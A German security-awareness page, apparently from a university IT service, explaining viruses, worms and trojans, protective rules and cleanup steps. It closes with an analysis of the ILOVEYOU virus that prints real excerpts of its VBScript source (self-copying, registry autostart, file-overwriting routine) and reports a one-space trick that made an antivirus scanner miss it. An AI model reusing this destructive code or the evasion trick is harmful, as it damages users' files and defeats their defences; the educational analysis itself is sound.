|
Viren
Jeden Tag werden mehr als hundert neue Viren und Trojaner ins Netz geschleust. Insgesamt sind derzeit weit über 50 000 verschiedene Schädlinge und deren Unterarten bekannt.
Viren sind kleine Programme, die etwa als Anhang von E-mails auf den Computer eingeschleust werden, die sich aber auch in Programmen verstecken können. Die Namensgebung kommt nicht von ungefähr: die meisten Viren sind darauf programmiert, sich selbst zu vervielfältigen und anschliessend weiter zu verbreiten. Viren können enormen Schaden anrichten bis hin zum kompletten Datenverlust oder dem berüchtigten Festplatten-Crash.
Man unterscheidet zwischen drei Arten von Viren:
File-Viren
hängen sich an eine Programmdatei an und werden beim Start dieses Programms ausgeführt.
Boot-Viren
setzen sich im Boot-Sektor einer Diskette oder im Boot- oder Partitions-Sektor einer Festplatte fest und werden beim Starten (eng. = "booten") des Rechners aktiv.
Makro-Viren
verstecken sich als Makros in Office-Dokumenten oder anderen Dateien und werden beim Start der entsprechenden Programme aktiv.
Was machen Viren?
Das erste Ziel eines Virus ist immer die eigene unbemerkte Verbreitung. Es gibt eine Reihe von Viren, die zwar weit verbreitet sind, jedoch keine oder lediglich geringe Schäden verursachen. In diesen Fällen geht es den Programmierern vermutlich in erster Linie darum, ihre Fähigkeiten unter Beweis zu stellen oder auf Sicherheitslücken hinzuweisen.
Die gefährlichste Gruppe von Viren sind die, die bei der Ausführung tatsächlich Schäden hervorrufen.
-
Zahleiche Viren (insbesondere MBR-Viren) nisten sich nach dem Aktivieren im Arbeitsspeicher ein, um von dort ihr zerstörerisches Werk fortzusetzen und weitere Dateien/Programme zu infizieren.
-
Zerstörung des Datenbestands: diese Viren arbeiten z.B. durch Verändern der Dateizuordnungstabellen, durch Löschen oder Überschreiben von Daten.
-
Fälschen des Datenbestands: Viren dieses Typs verändern bestimmte Daten, indem Sie Inhalte verfälschen oder hinzufügen.
-
Unbrauchbarmachen des Systems: Veränderungen durch diesen Typ bewirken, dass ein Computer unbrauchbar wird, z.B. durch Verändern oder Löschen wichtiger Betriebssystemdateien. Dieser Virustyp erzeugt einen unverhältnismäßig großen Schaden durch den verursachten Arbeitszeitausfall.
Würmer sind schädliche Programme, die es vor allem auf eines abgesehen haben: sich möglichst schnell zu verbreiten. Einmal "auf die Reise geschickt", nutzt ein Wurm alle Möglichkeiten, sich im Internet, über E-mails oder in Firmennetzen selbst per Massenmail weiter zu verschicken. Das hat unterschiedliche Folgen. Manche Würmer wie etwa Nimbda im September 2001 verlangsamen Rechner durch ihre ständigen Versuche, sich weiter zu verbreiten. Andere Würmer transportieren einen Virus oder Trojaner wie Badtrans-B im November 2001. Und der entwickelt dann in allen befallenen Systemen seine schädlichen Aktivitäten.
Trojaner hingegen richten mittelbaren Schaden an. Die meisten Trojaner sind darauf programmiert, auf dem infizierten Rechner Daten zu sammeln, angefangen von Passworten und Kreditkartennummern bis hin zu kompletten Eingaben über die Tastatur. Diese Daten können dann über das Internet an den "Lenker" des Trojaners übermittelt werden. Noch gefährlicher sind die so genannten "Server-Programme". Haben Sie sich erst einen Trojaner dieser Art eingefangen, kann ein anderer User online auf Ihren Computer zugreifen, ihn steuern und ihm bestimmte Befehle geben. Um dies möglich zu machen, öffnet der Trojaner am befallenen Rechner bestimmte Ports. Ports sind vergleichbar mit Eingangstüren zum Internet. Durch diese offenen Ports hat der Trojaner-Lenker dann Zugriff.
Hacker nutzen bestimmte Programme (Port-Scanner"), um im Internet nach Rechnern zu suchen, die von einem Trojaner befallen sind. Diese Scans bemerkt man in der Regel nur durch eine Firewall, die solche Zugriffsversuche aufzeichnet.
Obwohl es Trojaner schon sehr lange gibt, werden sie sich in nächster Zeit zu einer richtigen Bedrohung auch für Sie entwickeln, mindestens so gefährlich, wie Viren.
Sie sind für potentielle Angreifer leichter zu Programmieren und das Opfer installiert sie sogar noch auf seinem Computer.
Wie kann ich Trojaner finden?
Eine Entdeckungsgefahr ist gering.
Lediglich durch spezielle Programme für Computerexperten, die das Öffnen von Dateien und den Datenverkehr mit dem Internet überwachen, wären sie aufzuspüren. Mir ist bisher leider kein Programm bekannt, welches diese Funktionen kombiniert ausführt. Glücklicherweise durchsuchen Antivirenprogramme auch bekannten Trojanischen Pferden. Aber leider bildet die Gruppe der bekannten Trojaner nur die Spitze eines Eisberges. Der Hauptteil ist Naturgemäß unbekannt.
Bekannteste Beispiele von Trojanern sind SubSeven, Hack'A'Tack und Back-Orifice.
|
Verhalten bei Virenbefall? |
|
|
Viren, Würmer und Trojaner sind etwas Verschiedenes. Gemeinsam haben sie allerdings eins: Man kann und man muss sich vor ihnen schützen. Ein gutes Antivirenprogramm ist deshalb unbedingt erforderlich, um einigermassen sicher im Internet zu surfen. Wichtig ist dabei die Möglichkeit regelmässiger Updates. Denn ein veralteter Virenscanner ist so gut wie nutzlos.
Gute Schutzprogramme sind derzeit ab rund 20 € zu haben, allerdings gibt es auch kostenlose Programme, die ihren Zweck durchaus erfüllen. Oft nämlich geben Hersteller ihre Antiviren-Software aus Werbegründen an Privatnutzer kostenfrei ab und verlangen nur für die kommerzielle Nutzung Geld.
Was machen wenn das Antivirenprogramm nicht hilft ?
Bei manchen Antivirenprogrammen erfolgt das Löschen oder Säubern von befallenen Dateien in vielen Fällen automatisch durch die Anti-Viren-Software. Falls dies nicht der Fall ist, müssen Sie die im folgenden beschriebenen Schritte selbst durchführen.
Im Fall des Falles (besser ein Virus wird erkannt, als er arbeitet unerkannt weiter) beachten Sie bitte folgende einfache Regeln:
- Ruhe bewahren -
Ein überhastetes Ausschalten des PCs ist meist ungeeignet und kann weitere Schäden verursachen.
- Lesen Sie die Informationen am Bildschirm -
Meist werden Sie aufgefordert, Ihre Daten zu sichern, danach den PC herunterzufahren und auszuschalten.
- Regedit säubern
- Wollen Sie die Einträge stattdessen komplett aus der Registry entfernen, dann starten Sie den Registry-Editor (Regedit.exe) und navigieren Sie der Reihe nach zu den Registry-Schlüsseln, die einen solchen Eintrag enthalten könnten. Klicken Sie im Registry-Editor jeweils den RUN bzw. RunServices-Schlüssel an, dann sehen Sie in der rechten Fensterhälfte die darin geladenen Dateien. Löschen Sie die unerwünschten Einträge in der rechten Fensterhälfte via rechte Maustaste. Sie sollten hier auf gar keinen Fall etwas löschen, das Sie nicht genau kennen, sondern testen Sie vorher lieber die MSCONFIG-Methode. Sichern Sie vorher unbedingt die Registry oder den gewählten Zweig über «Registrierung/Registrierungsdatei exportieren».
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_USERS\[IhrName]\Software\Microsoft\Windows\CurrentVersion\Run
- Sauberes Hochfahren -
Starten Sie den PC mittels einer garantiert virenfreien Bootdiskette.
- Suchen und Entfernen -
Starten Sie von dieser Diskette den Virusscanner und lassen Sie den Virus wenn möglich entfernen - oder ersetzen Sie die befallenen Dateien durch die virenfreie Original-Version von der Software-CD bzw. "Desaster-Disk" oder von einem Backup.
Bereiten Sie zu diesem Zweck eine verlässlich virenfreie Startdiskette mit den wichtigsten System-Befehlen, System-Informationen und einem Virus-Scanner vor und aktivieren Sie den Schreibschutz auf dieser Diskette, ergänzt um entweder alle originalen Software-CDs oder eine für Ihren PC zusammengestellte CD-ROM ("Desaster-Disk").
Was muss ich tun, um mich und die BOKU gegen Viren zu schützen?
Bei allen PCs und sonstigen Rechnern innerhalb der BOKU - und so weit und so oft wie möglich auch auf allen Notebooks - müssen Sie:
-
eine virenfreie Boot-Diskette (mit Schreibschutz) und einen virenfreien Software-Backup (auf CD-ROM, "Desaster-Disk") aufbewahren
-
alle Security-Regeln einhalten
-
regelmäßig alle notwendigen Security-Patches der System- und Anwendungs-Software installieren
-
den jeweils aktuellen Novell-Client verwenden
-
Antiviren-Software< installieren und aktivieren
-
regelmäßig die Daten der Antiviren-Software aktualisieren (z.B. durch automatisches Update beim Novell-Login)
-
regelmäßig alle Dateien auf Viren überprüfen (Scan, z.B. täglich in der Mittagspause)
-
jede Diskette zunächst (mit Schreibschutz) auf Viren prüfen, bevor sie gelesen oder beschrieben wird
-
keine Diskette im Laufwerk "vergessen"
-
keine unbekannten Programme ausführen und keine Programme, die Sie auf einem unsicheren Weg erhalten haben, ausführen (gilt auch für Word-Files etc., die Macros enthalten können)
-
keine E-Mail-Attachments anzeigen oder ausführen, wenn Sie sich nicht vergewissert haben, dass sie tatsächlich von einem vertrauenwürdigen Absender kommen
-
den Web-Browser auf hohe Sicherheit einstellen, z.B. aktive Elemente wie JavaScript etc. standardmäßig ausschalten und nur bei vertrauenswürdigen Web-Pages einschalten und danach wieder ausschalten
-
da E-Mails und Web-Pages gefälschte Absenderadressen enthalten können, stets auf anderem Wege (z.B. digitale Signatur, telefonischer Rückruf) vergewissern, dass die Software tatsächlich vom angegebenen Absender kommt
-
Software-Produkte vermeiden, für die es besonders viele Viren gibt (z.B. lieber Pegasus Mail statt Outlook Express verwenden)
-
regelmäßig Login und Logout machen (zumindest täglich)
-
nicht unter den "gefährlichen" Usernames root oder administrator arbeiten, sondern unter den persönlichen Usernames
Internet Explorer und Active-X: ActiveX abschalten
Schalten Sie Java ab, wenn Sie es nicht benötigen. Sehr wichtig ist es auch Aktive X zu deaktiveren.
Was auch zu den wichtigsten Punkten zum Schutz zählt, ist das regelmäßiges überprüfen und installieren von Securitypatchs bei Microsoft.
ActiveX ist gefährlich. Über diese Programm-Schnittstelle in Ihrem Internet Explorer können böswillige Anbieter Code auf Ihrem PC starten und beispielsweise Dialer oder Spionageprogramme installieren.
Am besten ist es, ActiveX grundsätzlich abgeschaltet zu lassen.
Deshalb sollten Sie ActiveX ausschalten. Klicken Sie dazu im Internet Explorer auf Extras - Internetoptionen und Sicherheit.
Im Allgemeinen ist hier die Sicherheitsstufe Mittel eingestellt. Klicken Sie auf Stufe Anpassen.
Schalten Sie alle Optionen unter ActiveX-Steuerelemente und Plugins auf Deaktivieren.
Nach einem Klick auf Ok ist Ihr Explorer sicherer geworden.
Einen Haken hat das Ganze: Das Windows-Update läßt sich mit dem Internet Explorer ohne ActiveX nicht ausführen. Dazu können Sie aber in Extras - Internetoptionen - Sicherheit die Sicherheitsbeschränkungen mit einem Klick auf Standardstufe und dem Einstellen der Stufe auf Mittel vorübergehend aufheben. Nach dem Update schalten Sie ActiveX wieder ab.
Java: Mehr Sicherheit durch das Sandbox-Prinzip
Die Java-Funktionen wurden unter besonderer Beachtung von Sicherheitsaspekten entwickelt. Typische Programmierfehler sollten durch ein besonderes Design dieser Programmiersprache von vorneherein ausgeschlossen werden.
Die unter Sicherheitsaspekten wichtigste Eigenschaft von Java-Programmen ist die so genannte Sandbox. Dabei handelt es sich um einen eingeschränkten Bereich, in dem das Java-Programm laufen darf. Die Sandbox regelt den Zugriff des Java-Programms auf Systemressourcen wie Festplatten, Arbeitsspeicher oder Windows-Funktionen.
Die Verwaltung dieser Ressourcen ist einem Java-Programm normalerweise nicht erlaubt - im Gegensatz etwa zu Active-X-Controls, welche die gesamte Windows-Funktionalität nutzen dürfen. Es gibt jedoch Möglichkeiten, diese Sandbox aufzubrechen und damit die Sicherheitsmechanismen auszuhebeln.
Aus diesem Grund haftet Java ein unsicherer Ruf an, und viele Anwender schalten diese Erweiterung ab. Java-Programme (Applets) verwenden einen speziellen Interpreter, der den Code ausführt: die Java Virtual Machine (VM). Für jedes Betriebssystem gibt es solche VMs, so dass Java-Programme theoretisch auf allen Plattformen laufen. Sicherheitsprobleme entstehen häufig durch Programmierfehler in den VMs, so dass ein Applet eventuell doch Zugriff auf das Dateisystem bekommt.
Aufgrund der Plattformunabhängigkeit wirken sich Sicherheitsprobleme auf alle Java-fähigen Betriebssysteme aus, also zum Beispiel auch auf Mac-OS oder Unix-Systeme. Java-Applets werden eher selten auf Web-Seiten eingesetzt. Typische Anwendungen finden sich zum Beispiel im Bereich des Online-Bankings, wo eine gesicherte Datenübertragung vom Kunden zur Bank notwendig ist. Häufig werden Java-Applets auch für Spielereien benutzt. Trotzdem sollten Sie Java im Browser abschalten. Ist Java für das Ausführen einer Web-Seite absolut erforderlich, gibt der Browser eine entsprechende Fehlermeldung aus, so dass Sie Java wieder kurzfristig aktivieren können.
Manche (älterer) Viren sind harmlose Spielereien, die aber immerhin auch Zeit und EDV-Ressourcen kosten.
Die meisten Viren und alle Würmer und Trojaner sind sehr gefährlich, sie können Dateien und Programme zerstören, geheime Informationen ausspionieren, einzelne Rechner oder ganze Netzwerke lahmlegen.
Viele Viren wirken sofort. Man wird zwar in der Arbeit behindert oder unterbrochen, merkt aber sofort, dass etwas nicht in Ordnung ist und kann den Virus vom PC entfernen (siehe Verhalten bei Virenbefall) und die Software und Daten von einem geeigneten Backup wieder herstellen.
Manche Viren richten den Schaden erst zu einem späteren Zeitpunkt an, z.B wenn der 13. eines Monats auf einen Freitag fällt oder am Geburtstag des Malers Michelangelo. Bis dahin merkt der User gar nicht, dass er einen Virus hat, und der Virus kann sich in Ruhe auf andere Dateien und Rechner weiter verbreiten. Wenn dann der Schaden eintritt, kann es sein, dass auch schon alle Backups die mit dem Virus infizierte Version der Dateien enthalten und man den Rechner nicht mehr (oder nur durch Rückkehr auf einen sehr alten Datenstand) in einen sauberen Zustand bringen kann.
Dies zeigt, wie wichtig es ist, alle Dateien und Programme regelmäßig auf Viren zu überprüfen (Viren-Scan).
Manche Programme, Viren oder Würmer führen zwar selbst keine schädlichen Aktivitäten aus, treten aber in so hoher Anzahl auf, dass die Rechner und Netze überlastet werden und keine Ressourcen mehr für die sinnvollen Arbeiten übrig bleiben. Dies wird als "Denial of Service" (DoS) bezeichnet.
Fast jeder kennt ihn, den ILOVEYOU-Virus. Er verbreitete sich rasend schnell per E-Mail. Aber wie hat er funktioniert?
Der ILOVEYOU-Virus ist ein sehr primitiver Skript-Virus (Skript bedeutet, es handelt sich um eine Textdatei mit der Endung .vbs, "Visual Basic for Scripting", welche vom Windows Scripting Host interpretiert und ausgeführt wird). Diese .vbs-Datei hieß dann oftmals "LOVE-LETTER-FOR-YOU.TXT.vbs", die doppelte Endung ist ein kleiner Trick: Bei den Standardeinstellungen von Windows ist das "Ausblenden bekannter Dateiendungen" aktiviert, d.h. die Datei wird als "LOVE-LETTER-FOR-YOU.TXT" angezeigt (behält aber das Skript-Symbol). Vielleicht waren dadurch viele User verwirrt oder hielten es für eine einfache Text-Datei und öffneten diese per Doppelklick, was aber die Ausführung der Datei startete.
Nun wollen wir uns dem Inhalt der ILOVEYOU-Virus widmen, seine Funktionsweise wird anhand von Ausschnitten erklärt. Am Anfang der Datei stehen ein paar Kommentare:
rem barok -loveletter(vbe) i hate go to school
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philipines
On Error Resume Next
bewirkt, dass bei einem Fehler einfach die nächste Anweisung ausgeführt wird.
Dann werden die Variablen deklariert:
dim fso,dirsystem,dirwin,regedit,file,vbscopy,c,ext,f1,ap
Set fso = CreateObject("Scripting.FileSystemObject")
Set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
und manchen von ihnen werden Werte zugewiesen
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Jetzt wird der Pfad des Windows-Ordners (z.B. C:\Windows) und der des System-Ordners
(z.B. C:\Winnt\System32) ausgelesen und in Variablen gespeichert.
Set c = fso.GetFile(WScript.FullName)
c.Copy(dirsystem & "\MSKernel32.vbs")
c.Copy(dirwin & "\Win32DLL.vbs")
c.Copy(dirsystem & "\LOVE-LETTER-FOR-YOU.TXT.vbs")
Der Variable "c" wird die zurzeit ausgeführte Virus-Datei zugewiesen, anschließend kopiert sich der Virus zweimal in den System-Ordner und einmal in den Windows-Ordner, auch hier spielt die Standardeinstellung von Windows eine Rolle: der normale User wird "MSKernel32" und "Win32DLL" für System-Dateien halten.
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\Run\MSKernel32",dirsystem & "\MSKernel32.vbs"
regedit.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\RunServices\Win32DLL",dirwin & "\Win32DLL.vbs"
Jetzt schreibt der Virus noch zwei Autostart-Einträge in die Registrierung, so dass er auch nach einem Neustart automatisch wieder läuft. Und was natürlich nicht fehlen darf, die Schadensroutine. Der Virus führt folgende Prüfung für jede Datei auf der Festplatte durch:
if (ext="vbs") or (ext="vbe") then
Set ap=fso.OpenTextFile(f1.path,2,true)
ap.Write vbscopy
ap.Close
elseif (ext="js") or (ext="jse") or (ext="css") or (ext="wsh") _
or (ext="jpg") or (ext="jpeg") then
Set ap=fso.OpenTextFile(f1.path,2,true)
ap.Write vbscopy
ap.Close
renamefile(f1.path, f1.path & ".vbs")
elseif (ext="mp3") or (ext="mp2") then
Set ap=fso.CreateTextFile(f1.path & ".vbs")
ap.Write vbscopy
ap.Close
fso.GetFile(f1.path).attributes=fso.GetFile(f1.path).attributes+2
end if
"ext" steht für "extension" und heißt so viel wie Erweiterung, hier ist es die Dateiendung. Wird also eine Datei mit der Endung "vbs" oder "vbe" gefunden (andere Visual Basic for Scripting - Dateien), so wird sie einfach mit dem Virus überschrieben. Bei Dateien mit der Endung "js", "jse" (beides JavaScript), "css" (Cascading Style Sheets, HTML-Zusatzdateien), "wsh" (WindowsScriptingHost), "jpg" oder "jpeg" (beides Bilder, beliebtes Bildformat im Internet) werden diese auch überschrieben, anschließend wird aber noch ".vbs" angehängt, damit der Virus bei Doppelklick auch direkt ausgeführt wird. Dann wird noch nach MP3 und MP2-Dateien gesucht, hierbei wird aber nur eine neue Datei erstellt und die alte versteckt, d.h. der User startet den Virus, wenn er die Datei mit der (standardmäßig versteckten) Endung ".vbs" öffnet.
Mit dem Überschreiben der JPG- und JPEG-Dateien richtet der ILOVEYOU-Virus auch bei Servern einen großen Schaden an, alle Bilder, die z.B. auf den Internetseiten (HTML) dargestellt wurden sind verloren.
Am Ende liest der Virus noch das Adressbuch von Outlook aus und verschickt sich automatisch an alle E-Mailadressen, die er finden kann (dieser Abschnitt ist hier aus Sicherheitsgründen nicht dargestellt)!
So primitiv und doch so erfolgreich, dieser Virus. Wie kommt das? Der Virus nutzt unsere Gefühle aus! Wer würde schon eine E-Mail löschen, an die auf den ersten Blick ein ungefährlicher Liebesbrief im Nur-Text-Format angehängt ist? Anscheinend waren viele Menschen neugierig und wollten lesen, was man ihnen geschickt hat.
Aktuelle Anti-Virenprogramme erkennen den ILOVEYOU-Virus zuverlässig, glauben wir jedenfalls! Probieren Sie es aus, kopieren Sie die oben veröffentlichten Teile in eine ".txt"-Datei (ungefährlich, da eine ".txt"-Datei nicht ausgeführt wird) und scannen Sie diese mit Ihrem Virenscanner, das Resultat können Sie vielleicht unter diesen Bericht als Kommentar schreiben!
Ich habe mit dem von CHIP empfohlenen Virenscanner von H+BEDV etwas erschreckendes herausgefunden: Den Virus im Original erkennt das Programm problemlos, fügt man aber ein Leerzeichen in die erste Deklarationszeile, so findet der Virenscanner nichts. Dieses Leerzeichen hat keine Bedeutung, von Windows wird exakt das gleiche ausgeführt. Dieser Virenscanner steht bei CHIP-Online unter den Top10, d.h. viele Menschen benutzen und vertrauen ihm. Es wäre kein Problem den Virus in eine ".vbs"-Datei zu kopieren und zu starten, er könnte von technischer Sicht wieder einen großen Schaden anrichten, aber vielleicht haben wir Menschen ja dazu gelernt.
Hinweis:
Dieser Artikel soll keineswegs als Anleitung dienen um diesen Virus zu erstellen und zu verbreiten. Vielmehr soll es Ihnen bewusst machen, dass selbst harmlos aussehende Dateien, welche man per E-Mail erhält, eine potenzielle Gefahr sind. Lassen Sie sich daher keinesfalls täuschen und bleiben Sie stets Misstrauisch! Für die hier zur Verfügung gestellten Informationen wird keinerlei Haftung übernommen.
|
